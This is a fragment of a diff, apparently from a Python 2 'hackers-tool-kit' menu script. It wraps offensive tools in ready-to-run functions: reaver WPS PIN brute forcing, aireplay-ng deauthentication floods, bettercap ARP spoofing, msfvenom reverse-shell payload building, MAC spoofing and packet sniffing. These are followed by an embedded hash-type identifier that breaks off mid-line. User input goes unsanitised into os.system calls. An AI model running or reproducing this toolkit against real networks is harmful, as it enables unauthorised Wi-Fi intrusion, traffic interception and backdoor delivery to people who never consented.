+#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False 